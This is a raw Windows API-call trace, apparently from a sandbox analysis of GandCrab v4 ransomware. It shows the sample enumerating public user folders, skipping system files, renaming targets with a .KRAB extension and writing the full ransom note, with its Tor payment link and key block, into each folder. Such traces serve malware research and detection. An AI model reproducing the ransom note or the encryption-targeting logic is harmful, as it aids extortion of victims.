[0101.022] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.022] lstrcmpW (lpString1="AccountPictures", lpString2=".") returned 1 [0101.022] lstrcmpW (lpString1="AccountPictures", lpString2="..") returned 1 [0101.022] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="AccountPictures" | out: lpString1="C:\\Users\\Public\\AccountPictures") returned="C:\\Users\\Public\\AccountPictures" [0101.022] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\AccountPictures\\") returned="C:\\Users\\Public\\AccountPictures\\" [0101.022] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.023] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.023] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.023] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.023] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.023] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.023] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.024] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\AccountPictures\\\\KRAB-DECRYPT.txt") returned 49 [0101.024] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\public\\accountpictures\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0101.027] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0101.027] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0101.028] CloseHandle (hObject=0x320) returned 1 [0101.028] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.028] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.029] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0xe7)) [0101.029] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.029] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.030] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.030] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\AccountPictures\\d2ca4a08d2ca4dee3d.lock") returned 55 [0101.030] CreateFileW (lpFileName="C:\\Users\\Public\\AccountPictures\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\accountpictures\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0101.037] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.038] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.038] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\") returned 32 [0101.038] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\AccountPictures\\*") returned="C:\\Users\\Public\\AccountPictures\\*" [0101.038] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\AccountPictures\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbe0a0 [0101.038] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0101.038] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.038] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0101.038] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0101.038] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.038] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0101.039] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0101.039] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Public\\AccountPictures\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Public\\AccountPictures\\d2ca4a08d2ca4dee3d.lock" [0101.039] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.039] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\AccountPictures\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 60 [0101.039] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\d2ca4a08d2ca4dee3d.lock") returned 55 [0101.039] lstrlenW (lpString=".lock") returned 5 [0101.039] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.039] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0101.039] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.040] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.040] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.040] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0101.040] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0101.040] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\AccountPictures\\desktop.ini") returned="C:\\Users\\Public\\AccountPictures\\desktop.ini" [0101.040] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.041] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\AccountPictures\\desktop.ini.KRAB") returned 48 [0101.041] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\desktop.ini") returned 43 [0101.041] lstrlenW (lpString=".ini") returned 4 [0101.041] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.041] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0101.041] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.041] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\desktop.ini") returned 43 [0101.042] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\desktop.ini") returned 43 [0101.042] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0101.042] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.042] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.042] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0101.042] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0101.042] lstrcatW (in: lpString1="C:\\Users\\Public\\AccountPictures\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\AccountPictures\\KRAB-DECRYPT.txt") returned="C:\\Users\\Public\\AccountPictures\\KRAB-DECRYPT.txt" [0101.042] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.042] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\AccountPictures\\KRAB-DECRYPT.txt.KRAB") returned 53 [0101.042] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\KRAB-DECRYPT.txt") returned 48 [0101.042] lstrlenW (lpString=".txt") returned 4 [0101.043] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.043] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0101.043] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.043] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\KRAB-DECRYPT.txt") returned 48 [0101.043] lstrlenW (lpString="C:\\Users\\Public\\AccountPictures\\KRAB-DECRYPT.txt") returned 48 [0101.043] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0101.043] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0101.043] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0101.043] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0101.043] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0101.043] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0101.043] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0101.044] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0101.044] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0101.044] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0101.044] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.044] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0101.044] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0101.045] CloseHandle (hObject=0x320) returned 1 [0101.045] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.045] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0101.045] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0101.045] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Public\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Public\\d2ca4a08d2ca4dee3d.lock" [0101.045] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.045] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 44 [0101.045] lstrlenW (lpString="C:\\Users\\Public\\d2ca4a08d2ca4dee3d.lock") returned 39 [0101.046] lstrlenW (lpString=".lock") returned 5 [0101.046] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.046] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0101.046] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.046] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.046] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.047] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0101.047] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0101.047] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Desktop" | out: lpString1="C:\\Users\\Public\\Desktop") returned="C:\\Users\\Public\\Desktop" [0101.047] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0101.047] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.047] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.047] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.047] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.047] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.047] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.048] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.048] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Desktop\\\\KRAB-DECRYPT.txt") returned 41 [0101.048] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\public\\desktop\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0101.061] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0101.061] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0101.062] CloseHandle (hObject=0x320) returned 1 [0101.063] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.064] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.064] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x109)) [0101.065] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.065] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.065] 